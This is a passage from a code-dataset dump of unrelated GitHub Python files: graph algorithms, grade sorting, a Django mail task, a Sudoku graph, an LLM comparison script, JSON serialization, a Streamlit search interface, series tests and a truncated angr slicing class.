print(distance[i])","repo_name":"GangHub1970/Algorithm","sub_path":"algorithm/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11483474133","text":"################ 读取文件-4:逐行读取两字段:(姓名,英语)的常用统计,字典应用 ####################\n# list tuple set dict stack queue\nwith open('六���级学生9个班成绩.txt',\"r\") as fr:\n i=0\n dt={} #定义字典,名称,变量名: dt dt['fox']=12,dt={\"fox\"=12}\n while True:\n s0=fr.readline()\n if len(s0)<2:\n break;\n s1=s0.replace('\\n','') #去掉换行符\n s2=s1.split('\\t') #按制表符拆分成元组\n #print(s2[0],s2[4])\n if i>0: #跳过中文表头\n dt[s2[0]]=int(s2[4]) #向字典中添加\"键-值\"对\n i=i+1\nfr.close()\nprint(\"人数:{0}\".format(len(dt)))\n\n#按英语成绩排序(从小到大),带姓名输出, d[0]:姓名, d[1]:值\ndt2=sorted(dt.items(), key=lambda d: d[1], reverse=False)\n#print(dt2);print()\n\n#按英语成绩排序(从大到小),带姓名输出:\ndt3=sorted(dt.items(), key=lambda d: d[1], reverse=True)\n#print(dt3);print()\nfor m in dt3:\n #print(m)\n #print(m[0],m[1])\n print(m[0]+\": \"+str(m[1])+\"分\")\n\n\n#按姓氏内码(从大到小),带姓名输出:\ndt4=sorted(dt.items(), key=lambda d: d[0])\n#print(dt4);print()\n\n","repo_name":"xiang-daode/Python3_codes","sub_path":"六年级学生9个班成绩_4逐行读取与排序.py","file_name":"六年级学生9个班成绩_4逐行读取与排序.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26378273133","text":"from django.core.mail import send_mail\nfrom wex.celery import app\nfrom celery import shared_task\nfrom django import template\nfrom django.contrib.auth.models import User\nfrom django.core.mail import EmailMessage, EmailMultiAlternatives\n\n@shared_task\ndef send_welcome_mail(host, username, token_key):\n user = User.objects.filter(username=username).first()\n if user:\n ctx = {\"host\": host, \"user\": user, \"token_key\": token_key}\n html = template.loader.get_template('emails/welcome-mail.html').render(ctx) \n send_mail(\n 'WELCOME',\n 'msg',\n 'amobitinfo@gmail.com',\n [user.email],\n fail_silently=False,\n html_message = html\n )","repo_name":"samuelitwaru/wex-erp","sub_path":"core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11415866425","text":"from graph import Graph\r\nfrom math import sqrt\r\nclass SudokuConnections : \r\n def __init__(self,n) : # constructor\r\n\r\n self.graph = Graph(n) # Graph Object\r\n self.n=n\r\n self.rows = n\r\n self.cols = n\r\n self.total_blocks = self.rows*self.cols #81\r\n\r\n self.__generateGraph() # Generates all the nodes\r\n self.connectEdges() # connects all the nodes acc to sudoku constraints\r\n\r\n self.allIds = self.graph.getAllNodesIds() # storing all the ids in a list\r\n\r\n \r\n\r\n def __generateGraph(self) :\r\n for idx in range(1, self.total_blocks+1) : \r\n _ = self.graph.addNode(idx)\r\n\r\n def connectEdges(self) :\r\n matrix = self.__getGridMatrix()\r\n\r\n head_connections = dict() # head : connections\r\n\r\n for row in range(self.n) :\r\n for col in range(self.n) :\r\n\r\n head = matrix[row][col] #id of the node\r\n connections = self.__whatToConnect(matrix, row, col)\r\n\r\n head_connections[head] = connections\r\n # connect all the edges\r\n\r\n self.__connectThose(head_connections=head_connections)\r\n\r\n def __connectThose(self, head_connections) :\r\n for head in head_connections.keys() : #head is the start idx\r\n connections = head_connections[head]\r\n for key in connections : #get list of all the connections\r\n for v in connections[key] :\r\n self.graph.addEdge(src=head, dst=v)\r\n\r\n\r\n def __whatToConnect(self, matrix, rows, cols) :\r\n connections = dict()\r\n\r\n row = []\r\n col = []\r\n block = []\r\n\r\n # ROWS\r\n for c in range(cols + 1, self.n):\r\n if rows < self.n and c < self.n:\r\n row.append(matrix[rows][c])\r\n\r\n connections[\"rows\"] = row\r\n\r\n # COLS\r\n for r in range(rows + 1, self.n):\r\n if r < self.n and cols < self.n:\r\n col.append(matrix[r][cols])\r\n\r\n connections[\"cols\"] = col\r\n # BLOCKS\r\n block_start_row = (rows // int(sqrt(self.n))) * int(sqrt(self.n))\r\n block_start_col = (cols // int(sqrt(self.n))) * int(sqrt(self.n))\r\n for i in range(block_start_row, block_start_row + int(sqrt(self.n))):\r\n for j in range(block_start_col, block_start_col + int(sqrt(self.n))):\r\n if i != rows and j != cols and i < self.n and j < self.n:\r\n block.append(matrix[i][j])\r\n\r\n connections[\"blocks\"] = block\r\n return connections\r\n\r\n\r\n def __getGridMatrix(self) :\r\n matrix = [[0 for cols in range(self.cols)]\r\n for rows in range(self.rows)]\r\n\r\n count = 1\r\n for rows in range(self.n) :\r\n for cols in range(self.n):\r\n matrix[rows][cols] = count\r\n count+=1\r\n return matrix\r\n","repo_name":"Kodjumba/LETIE","sub_path":"sudoku_connections.py","file_name":"sudoku_connections.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14225450272","text":"import json\nimport os\nimport time\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, AutoModel\nfrom transformers import LlamaTokenizer, LlamaForCausalLM\nfrom transformers import GPT2Tokenizer, GPT2Model, GPT2LMHeadModel\n\nimport transformers\nimport argparse\n\nimport requests\n\ndef generate_openai_response(messages, api_key, model=\"gpt-3.5-turbo\"):\n url = \"https://api.openai.com/v1/chat/completions\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {api_key}\",\n }\n \n data = {\n \"model\": model,\n \"messages\": messages\n }\n \n response = requests.post(url, headers=headers, json=data)\n \n if response.status_code == 200:\n chat_output = response.json()\n assistant_message = chat_output[\"choices\"][0][\"message\"][\"content\"]\n return assistant_message.strip()\n else:\n return f\"Error: {response.status_code}, {response.text}\"\n\ndef create_openai_message_object(text):\n # Initialize message object list\n messages = []\n \n # Search for the system, human, and response sections in the text\n system_start = text.find(\"### SYSTEM:\")\n human_start = text.find(\"### HUMAN:\") if text.find(\"### HUMAN:\") != -1 else text.find(\"### USER:\")\n response_start = text.find(\"### RESPONSE:\")\n \n # If both system and human sections are found, extract the content\n if system_start != -1 and human_start != -1:\n system_content = text[system_start + 11: human_start].strip()\n human_content = text[human_start + 11: response_start if response_start != -1 else None].strip()\n \n messages.append({\"role\": \"system\", \"content\": system_content})\n messages.append({\"role\": \"user\", \"content\": human_content})\n else:\n # If the system section is not found, just use the whole text as the user content\n messages.append({\"role\": \"user\", \"content\": text.strip()})\n \n return messages\n\n\ndef generate_deci_response(prompt, settings, max_new_tokens=4096, do_sample=True, top_p=0.95, early_stopping=True, num_beams=5, device = \"cuda\"):\n # for GPU usage or \"cpu\" for CPU usage\n\n settings[\"tokenizer\"].add_special_tokens({'pad_token': '[PAD]'}) \n\n # Tokenize the prompt and send it to the device\n inputs = settings[\"tokenizer\"](prompt, return_tensors=\"pt\", padding=True, truncation=True)\n \n if torch.cuda.is_available():\n # inputs = {key: val.to('cuda') for key, val in inputs.items()}\n inputs = {key: val.to(settings[\"device\"]) for key, val in inputs.items()}\n\n # Extract the input_ids and attention_mask\n input_ids = inputs['input_ids'] # Already on device\n attention_mask = inputs['attention_mask'] # Already on device\n\n # Generate text using the model\n outputs = settings[\"model\"].generate(input_ids, do_sample=do_sample, top_p=top_p, attention_mask=attention_mask, early_stopping=early_stopping, num_beams=num_beams)\n \n # Decode the output tensor to text\n return settings[\"tokenizer\"].decode(outputs[0], skip_special_tokens=True)\n\n\ndef generate_stabilityai_response(prompt, settings, max_new_tokens=4096, do_sample=True, top_p=0.95, top_k=0):\n # Prepare inputs for the model\n inputs = settings[\"tokenizer\"](prompt, return_tensors=\"pt\").to(settings[\"device\"])\n \n # Move inputs to GPU if available\n if torch.cuda.is_available():\n inputs = {key: val.to(settings[\"device\"]) for key, val in inputs.items()}\n \n # Remove the attention_mask from inputs if it exists\n if 'attention_mask' in inputs:\n del inputs['attention_mask']\n \n # Generate output using the model\n output = settings[\"model\"].generate(**inputs, do_sample=do_sample, top_p=top_p, top_k=top_k, max_new_tokens=max_new_tokens)\n \n # Decode and return the output\n return settings[\"tokenizer\"].decode(output[0], skip_special_tokens=True)\n\n\ndef generate_marx_response(prompt, settings, max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0): \n input_ids = settings[\"tokenizer\"](prompt, return_tensors=\"pt\").input_ids\n input_ids = input_ids.to(settings[\"device\"])\n\n # Print device of model parameters\n # for param in settings[\"model\"].parameters():\n # print(param.device)\n\n inputs = settings[\"tokenizer\"](prompt, return_tensors=\"pt\", legacy=False).to(settings[\"device\"])\n # Move inputs to GPU if available\n if torch.cuda.is_available():\n # inputs = {key: val.to('cuda') for key, val in inputs.items()}\n inputs = {key: val.to(settings[\"device\"]) for key, val in inputs.items()}\n\n output = settings[\"model\"].generate(**inputs, do_sample=do_sample, top_p=top_p, top_k=top_k, max_new_tokens=max_new_tokens)\n\n return settings[\"tokenizer\"].decode(output[0], skip_special_tokens=True)\n\n \ndef generate_falcon_1b_response(prompt, settings, max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0, device = \"cuda\", num_return_sequences=1):\n sequences = settings[\"pipeline\"](\n prompt,\n max_length=max_new_tokens,\n do_sample=do_sample,\n top_k=top_k,\n num_return_sequences=num_return_sequences,\n eos_token_id=settings[\"tokenizer\"].eos_token_id,\n )\n responses = []\n for seq in sequences:\n responses.append(seq['generated_text'])\n \n return responses[0]\n\ndef generate_chatglm_6b_response(prompt, settings, history =[], max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0, device = \"cuda\", num_return_sequences=1):\n response, history = settings[\"model\"].chat(settings[\"tokenizer\"], prompt, history=history)\n \n response_out = {\n \"response\" : response,\n \"history\" : history\n }\n\n return json.dumps(response_out)\n\ndef generate_gpt2_response(prompt, settings, max_new_tokens=512, do_sample=True, top_p=0.95, top_k=0, device=\"cuda\", num_return_sequences=1):\n settings[\"tokenizer\"].add_special_tokens({'pad_token': '[PAD]'}) \n \n # Tokenize the input and get attention mask\n encoded_input = settings[\"tokenizer\"](prompt, return_tensors='pt', padding=True, truncation=True)\n \n # Extract the input_ids and attention_mask\n input_ids = encoded_input['input_ids'].to(device) # Move to device\n attention_mask = encoded_input['attention_mask'].to(device) # Move to device\n\n # Generate model output\n output_data = settings[\"model\"].generate(input_ids, top_p=top_p, do_sample=True, attention_mask=attention_mask, max_length=max_new_tokens)\n\n output = settings[\"tokenizer\"].decode(output_data[0], skip_special_tokens=True)\n\n return output\n\n\n\ndef generate_gptj_response(prompt, settings, history =[], max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0, device = \"cuda\", num_return_sequences=1):\n settings[\"tokenizer\"].add_special_tokens({'pad_token': '[PAD]'}) \n \n # Tokenize the input and get attention mask\n encoded_input = settings[\"tokenizer\"](prompt, return_tensors='pt', padding=True, truncation=True)\n \n # Extract the input ids and attention mask\n input_ids = encoded_input['input_ids']\n attention_mask = encoded_input['attention_mask']\n\n # Generate model output\n output_data = settings[\"model\"].generate(input_ids, attention_mask=attention_mask, max_length=max_new_tokens)\n\n output = settings[\"tokenizer\"].decode(output_data[0], skip_special_tokens=True)\n\n return output\n\ndef generate_mistral_response(prompt, settings, history =[], max_new_tokens=2048, do_sample=True, top_p=0.95, top_k=0, device = \"cuda\", num_return_sequences=1):\n messages = []\n # Search for the system, human, and response sections in the text\n system_start = prompt.find(\"### SYSTEM:\")\n human_start = prompt.find(\"### HUMAN:\") if prompt.find(\"### HUMAN:\") != -1 else prompt.find(\"### USER:\")\n response_start = prompt.find(\"### RESPONSE:\")\n \n # If both system and human sections are found, extract the content\n if system_start != -1 and human_start != -1:\n system_content = prompt[system_start + 11: human_start].strip()\n human_content = prompt[human_start + 11: response_start if response_start != -1 else None].strip()\n \n messages.append({\"role\": \"system\", \"content\": system_content})\n messages.append({\"role\": \"user\", \"content\": human_content})\n else:\n # If the system section is not found, just use the whole text as the user content\n messages.append({\"role\": \"user\", \"content\": prompt.strip()})\n\n\n encodeds = settings[\"tokenizer\"].apply_chat_template(messages, return_tensors=\"pt\")\n\n model_inputs = encodeds.to(device)\n settings[\"model\"].to(device)\n\n generated_ids = settings[\"model\"].generate(model_inputs, max_new_tokens=1000, do_sample=True)\n output = settings[\"tokenizer\"].batch_decode(generated_ids)\n \n return output\n\ndef unload_gpu(settings):\n del settings[\"model\"]\n del settings[\"tokenizer\"]\n if \"pipeline\" in settings:\n del settings[\"pipeline\"]\n torch.cuda.empty_cache()\n\ndef setup_model(model_base = \"Deci\"):\n checkpoint = \"\"\n device = \"\"\n pipeline = None\n tokenizer = None\n model = None\n\n if model_base == \"stabilityai\":\n checkpoint = \"stabilityai/StableBeluga-7B\"\n device = \"cuda\" # for GPU usage or \"cpu\" for CPU usage\n\n tokenizer = AutoTokenizer.from_pretrained(\"stabilityai/StableBeluga-7B\", use_fast=False)\n model = AutoModelForCausalLM.from_pretrained(\"stabilityai/StableBeluga-7B\", torch_dtype=torch.float16, low_cpu_mem_usage=True)\n\n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n elif model_base == \"Marx\":\n checkpoint = \"acrastt/Marx-3B-V2\"\n device = \"cuda\" # for GPU usage or \"cpu\" for CPU usage\n\n tokenizer = LlamaTokenizer.from_pretrained(checkpoint)\n model = LlamaForCausalLM.from_pretrained(\n checkpoint, torch_dtype=torch.float16, low_cpu_mem_usage=True, device_map=device\n )\n\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n\n elif model_base == \"falcon-1b\":\n checkpoint = \"euclaise/falcon_1b_stage2\"\n device = \"cuda\" # for GPU usage or \"cpu\" for CPU usage\n\n tokenizer = AutoTokenizer.from_pretrained(checkpoint)\n pipeline = transformers.pipeline(\n \"text-generation\",\n model=checkpoint,\n tokenizer=tokenizer,\n torch_dtype=torch.bfloat16,\n device_map=\"auto\",\n )\n elif model_base == \"ChatGLM\":\n checkpoint = \"THUDM/chatglm2-6b\"\n device = \"cuda\"\n\n tokenizer = AutoTokenizer.from_pretrained(checkpoint, trust_remote_code=True)\n model = AutoModel.from_pretrained(checkpoint, trust_remote_code=True).half().cuda()\n \n if torch.cuda.is_available():\n model = model.to(device)\n\n model = model.eval()\n elif model_base == \"gpt2\":\n checkpoint = \"gpt2\"\n device = \"cuda\"\n\n tokenizer = GPT2Tokenizer.from_pretrained(checkpoint)\n model = GPT2LMHeadModel.from_pretrained(checkpoint)\n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n\n elif model_base == \"gpt3\" or model_base == \"gpt4\":\n checkpoint = model_base\n elif model_base == \"GPT-J\":\n checkpoint = \"EleutherAI/gpt-j-6B\"\n device = \"cuda\"\n\n tokenizer = AutoTokenizer.from_pretrained(checkpoint)\n model = AutoModelForCausalLM.from_pretrained(checkpoint)\n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n \n\n model = model.eval()\n elif model_base == \"Mistral\":\n checkpoint = \"mistralai/Mistral-7B-v0.1\"\n device = \"cuda\"\n\n model = AutoModelForCausalLM.from_pretrained(checkpoint)\n tokenizer = AutoTokenizer.from_pretrained(checkpoint)\n \n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n else:\n checkpoint = \"Deci/DeciLM-6b\"\n device = \"cuda\" # for GPU usage or \"cpu\" for CPU usage\n tokenizer = AutoTokenizer.from_pretrained(checkpoint)\n model = AutoModelForCausalLM.from_pretrained(checkpoint, torch_dtype=torch.bfloat16, trust_remote_code=True).to(device)\n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n\n settings = {\n \"checkpoint\" : checkpoint,\n \"device\" : device,\n \"tokenizer\" : tokenizer,\n \"model\" : model,\n \"pipeline\" : pipeline\n }\n\n return settings\n\ndef generate_response(prompt, model_base = \"Deci\", max_new_tokens=1024, responses=1, api_key=None, settings=None):\n # Check if the prompt is a file path\n if os.path.isfile(prompt):\n with open(prompt, 'r') as file:\n prompt = file.read()\n\n start_time = time.time()\n\n if settings is None:\n settings = setup_model(model_base)\n\n ret_resp = []\n for i in range(responses):\n if i > 0:\n start_time = time.time()\n \n resp = \"\"\n if model_base == \"stabilityai\":\n resp = generate_stabilityai_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"Marx\":\n resp = generate_marx_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"falcon-1b\":\n resp = generate_falcon_1b_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"ChatGLM\":\n # https://huggingface.co/THUDM/chatglm2-6b\n resp = generate_chatglm_6b_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"gpt2\":\n # https://huggingface.co/gpt2\n resp = generate_gpt2_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"gpt3\":\n # https://api.openai.com/v1/chat/completions\n messages = create_openai_message_object(prompt)\n resp = generate_openai_response(messages, model=\"gpt-3.5-turbo\", api_key=api_key)\n elif model_base == \"gpt4\":\n # https://api.openai.com/v1/chat/completions\n messages = create_openai_message_object(prompt)\n resp = generate_openai_response(messages, model=\"gpt-4\", api_key=api_key)\n elif model_base == \"GPT-J\":\n # https://huggingface.co/EleutherAI/gpt-j-6b\n resp = generate_gptj_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"Mistral\":\n # https://huggingface.co/EleutherAI/gpt-j-6b\n resp = generate_mistral_response(prompt, settings, max_new_tokens=max_new_tokens)\n else:\n resp = generate_deci_response(prompt, settings, max_new_tokens=max_new_tokens)\n time_length = time.time() - start_time\n data = {\n \"prompt\" : prompt,\n \"response\" : resp,\n \"model\" : model_base,\n \"time\" : time_length\n }\n ret_resp.append(data)\n\n unload_gpu(settings)\n\n return ret_resp\n\ndef TestModels(prompt, max_new_tokens=1024, api_key=None):\n print(\"Testing models...\")\n results =[]\n for model_base in [\"Mistral\",\"gpt2\", \"stabilityai\", \"falcon-1b\", \"Deci\", \"Marx\", \"ChatGLM\"]: # \"GPT-J\", \"gpt3\", \"gpt4\"]:\n print(f\"Testing {model_base}...\")\n start_time = time.time()\n responses = generate_response(prompt, model_base, max_new_tokens=max_new_tokens, responses=2, api_key=api_key)\n time_length = time.time() - start_time\n results.append({\n \"prompt\" : prompt,\n \"responses\" : responses,\n \"model\" : model_base,\n \"time\" : time_length\n })\n print(json.dumps(results[len(results)-1], indent=4))\n \n out_file = \"results.json\"\n\n with open(out_file, 'w') as file:\n file.write(json.dumps(results))\n\ndef loop_generate_response(initial_prompt, model_name=\"Deci\", max_new_tokens=1024, api_key=None):\n\n # Initialize chat history list\n chat_history = []\n \n # Initialize prompt with the starter prompt\n prompt = initial_prompt\n\n settings = setup_model(model_name)\n \n while True:\n # Record start time\n start_time = time.time()\n \n # Generate response using existing `generate_response` function\n response = generate_response(prompt, model_base=model_name, api_key=api_key, settings=settings)\n\n response = response[0][\"response\"]\n\n if prompt in response:\n response = response.replace(prompt, \"\").strip()\n \n # Record end time and calculate elapsed time\n end_time = time.time()\n elapsed_time = end_time - start_time\n \n # Append response and elapsed time to chat history\n chat_entry = {\n \"prompt\": prompt,\n \"response\": response,\n \"elapsed_time\": elapsed_time\n }\n chat_history.append(chat_entry)\n \n # Save chat history to chat.json\n with open(\"chat.json\", \"w\") as json_file:\n json.dump(chat_history, json_file)\n \n # Print the response\n print(f\"Response: {response}\")\n \n # Update the prompt for the next loop\n prompt = response\n\n\n# Example usage\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Generate response using AI model')\n parser.add_argument('prompt', type=str, help='Prompt or file path containing the prompt')\n parser.add_argument('--model', type=str, default=\"Deci\", help='Prompt or file path containing the prompt')\n parser.add_argument('--size', type=int, default=1024, help='Maximum token length for the generated response')\n parser.add_argument('--responses', type=int, default=1, help='Number of responses to generate')\n parser.add_argument('--openai_key', type=str, default=None, help='OpenAI api key.')\n\n args = parser.parse_args()\n\n time_length = 0\n \n TestModels(args.prompt, args.size, args.openai_key)\n # loop_generate_response(args.prompt, model_name=args.model, api_key=args.openai_key, max_new_tokens=args.size)\n\n\"\"\" start_time = time.time()\n responses = generate_response(args.prompt, args.model, max_new_tokens=args.size, responses=args.responses)\n time_length = time.time() - start_time\n response = {\n \"prompt\" : args.prompt,\n \"responses\" : responses,\n \"model\" : time_length,\n \"time\" : time_length\n }\n print(json.dumps(response)) \"\"\"\n","repo_name":"TheCompAce/Phoenix-Horizons","sub_path":"Server/modules/ai/ask_llm.py","file_name":"ask_llm.py","file_ext":"py","file_size_in_byte":19170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17384510949","text":"#!/usr/bin/python3\n\n\"\"\"\nClass of Base\nBase Class\n\"\"\"\n\nimport json\nimport os.path\n\n\nclass Base:\n\n \"\"\"Private class attribute\"\"\"\n __nb_objects = 0\n\n \"\"\"__init__ method\"\"\"\n\n def __init__(self, id=None):\n if (id is not None):\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = self.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"method returns JSON string representation of list_dictionaries\"\"\"\n if (list_dictionaries is None or list_dictionaries == ''):\n return \"[]\"\n else:\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"method that writes the JSON string\n representation of list_objs to a file\"\"\"\n filename = cls.__name__ + \".json\"\n with open(filename, 'w') as file:\n if (list_objs is None):\n list_objs = []\n list_dict = []\n for obj in (list_objs):\n list_dict.append(cls.to_dictionary(obj))\n file.write(Base.to_json_string(list_dict))\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"method that returns the list of\n the JSON string representation json_string\"\"\"\n if (json_string is None):\n return []\n else:\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"method that returns an instance with all attributes already set\"\"\"\n if cls.__name__ == \"Rectangle\":\n dummy = cls(1, 1)\n else:\n dummy = cls(1)\n dummy.update(**dictionary)\n return dummy\n\n @classmethod\n def load_from_file(cls):\n \"\"\"method that returns a list of instances\"\"\"\n file_name = cls.__name__ + \".json\"\n list_inst = []\n try:\n file = open(file_name, 'r')\n except IOError:\n return list_inst\n ch = cls.from_json_string(file.read())\n for i in (ch):\n list_inst.append(cls.create(**i))\n return (list_inst)\n","repo_name":"weedii/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22522367951","text":"import streamlit as st\nfrom doc_bd import Documents\nfrom motor_de_busqueda import metodo_booleano\n\n\nst.title(\"Sistema de Recuperación de Información\")\n\ncoleccion = st.selectbox(\n \"Elija la coleccion de documentos a utilizar:\", [\"ADI\", \"CISI\"])\n\nif coleccion == \"ADI\":\n df = open(\"Test Collections/adi/adi_data.json\")\n df_pre = open(\"Test Collections/adi/adi_data_prep.json\")\n df_pre_raiz = open(\"Test Collections/adi/adi_data_prep_raiz.json\")\nelse:\n df = open(\"Test Collections/cisi/cisi_data.json\")\n df_pre = open(\"Test Collections/cisi/cisi_data_prep.json\")\n df_pre_raiz = open(\"Test Collections/cisi/cisi_data_prep_raiz.json\")\n\ndocument = Documents(df, df_pre, df_pre_raiz)\n\ncol1, col2, col3, col4 = st.columns(4)\ncol_list = [col1, col2, col3, col4]\n\nst.subheader(\"Términos indexados\")\n\nstr_terms = \"\"\"\"\"\"\ntemp_index = 0\nindex_term = 0\nindex_cols = 0\n\nwith st.expander(\"Ver términos\", expanded=False):\n while index_term < len(document.terms):\n str_terms += str(document.terms[index_term]).ljust(19)\n index_term += 1\n temp_index += 1\n if temp_index == 4:\n str_terms += '\\n'\n temp_index = 0\n st.text(str_terms)\n\nquery = st.text_input(\"Inserte la consulta.\", \"\")\n\nstr_result = \"\"\nif st.button(\"Submit\") and query != \"\":\n doc_ok, term_omitidos, ok = metodo_booleano(document, query)\n st.subheader(\"Output:\")\n\n if not ok:\n st.warning('La consulta esta mal formulada.')\n else:\n if doc_ok:\n str_result += f\"Fueron recuperados {len(doc_ok)} documento\" + (\"s\" if len(doc_ok) > 1 else \"\")\n title_doc = {}\n for item in doc_ok:\n title_doc[document.doc_original[item]['titulo']] = item\n st.success(str_result)\n for item in range(len(doc_ok)):\n with st.expander(f'{list(doc_ok)[item]}. ' + list(title_doc.keys())[item].capitalize()):\n info_text = f\"Autor: {document.doc_original[list(doc_ok)[item]]['autor']}\\n\\n {document.doc_original[list(doc_ok)[item]]['texto'].capitalize()}\"\n st.text_area(\" \", info_text, height=150, disabled=True)\n else:\n st.error(\"No se recuperó ningún documento\")\n str_term = ''\n if term_omitidos:\n str_term += f\"Esta consulta contiene los siguientes términos que pueden ser considerados irrelevantes, lo cual puede afectar el resultado de la búsqueda de manera desfavorable \\n\"\n for term in term_omitidos:\n str_term += '- ' + str(term) + \"\\n\"\n st.warning(str_term)\n","repo_name":"Gusta2307/MRI","sub_path":"view_st.py","file_name":"view_st.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2419134525","text":"\"\"\"This file test code for series.py.\"\"\"\nimport pytest\n\n\nFIB_PARAMS = [(2, 1), (3, 2), (4, 3), (5, 5), (6, 8), (7, 13)]\n\n\nLUC_PARAMS = [(2, 3), (3, 4), (4, 7), (5, 11), (6, 18), (7, 29)]\n\n\nSUM_PARAMS = [\n (2, 0, 1, 1),\n (3, 0, 1, 2),\n (4, 0, 1, 3),\n (5, 0, 1, 5),\n (6, 0, 1, 8),\n (7, 0, 1, 13),\n (2, 2, 1, 3),\n (3, 2, 1, 4),\n (4, 2, 1, 7),\n (5, 2, 1, 11),\n (6, 2, 1, 18),\n (7, 2, 1, 29)\n]\n\n\n@pytest.mark.parametrize('n, result', FIB_PARAMS)\ndef test_fibonacci(n, result):\n \"\"\"Test the fibonacci function from the series file.\"\"\"\n from series import fibonacci\n assert fibonacci(n) == result\n\n\n@pytest.mark.parametrize('n, result', LUC_PARAMS)\ndef test_lucas(n, result):\n \"\"\"Test the lucas function from the series file.\"\"\"\n from series import lucas\n assert lucas(n) == result\n\n\n@pytest.mark.parametrize('n, a, b, result', SUM_PARAMS)\ndef test_sum_series(n, a, b, result):\n \"\"\"Test the sum_series function from the series file.\"\"\"\n from series import sum_series\n assert sum_series(n, a, b) == result\n","repo_name":"kavdi/math-series","sub_path":"test_series.py","file_name":"test_series.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27099642319","text":"#!/usr/bin/env python3\n\nimport logging\nimport rospy\nimport numpy as np\n\nfrom sensor_msgs.msg import LaserScan\nfrom std_msgs.msg import Float32MultiArray\nfrom logging_utils import setup_logger, get_logger\n\nclass Sonar2LaserScan:\n def __init__(self):\n self.logger = get_logger(\"Sonar2LaserScan\")\n self.logger.debug(\"Started Sonar2LaserScan init\")\n\n self.pub = [\n rospy.Publisher('/laser_scan0', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan1', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan2', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan3', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan4', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan5', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan6', LaserScan, queue_size=10)\n ]\n\n self.range_sub = rospy.Subscriber('/sonar_pairs', Float32MultiArray, self.sonar_callback, queue_size=10)\n\n self.msg = LaserScan()\n self.msg.angle_min = -25*np.pi/180\n self.msg.angle_max = 25*np.pi/180\n self.msg.angle_increment = 1*np.pi/180\n self.msg.time_increment = 0\n self.msg.scan_time = 0\n self.msg.range_min = 0.02\n self.msg.range_max = 2.0\n\n self.nb_point_per_sonar = int(((self.msg.angle_max-self.msg.angle_min)/self.msg.angle_increment)/2)\n\n\n def sonar_callback(self, data):\n id = int(data.data[0])\n frame_id = 'sonar_f_' + str(id)\n\n range1 = data.data[1]\n range2 = data.data[2]\n\n if range1>=self.msg.range_max:\n range1 = float(\"inf\")\n elif range1=self.msg.range_max:\n range2 = float(\"inf\")\n elif range2 node.addr and node.addr + node.size >= self._check_node.addr:\r\n self._check_node = node\r\n self._check_node_addr = node.addr\r\n break\r\n\r\n self._remove_unreachable_node()\r\n\r\n def do_slicing(self):\r\n slice_target_addrs = []\r\n patch_addr = self._patch_addr\r\n check_addr = self._check_node_addr\r\n angr_function_cfg = self.cfg\r\n if patch_addr is not None and check_addr is not None:\r\n addr = self._get_FLAG_instruction(check_addr)\r\n slice_target_addrs.append(addr)\r\n else:\r\n\r\n pre_nodes = angr_function_cfg.predecessors(self._check_node)\r\n for node in pre_nodes:\r\n addr = self._get_FLAG_instruction(node.addr)\r\n slice_target_addrs.append(addr)\r\n self._slice_target_addrs = slice_target_addrs\r\n if len(slice_target_addrs) == 0:\r\n raise Exception(\"target address is empty for 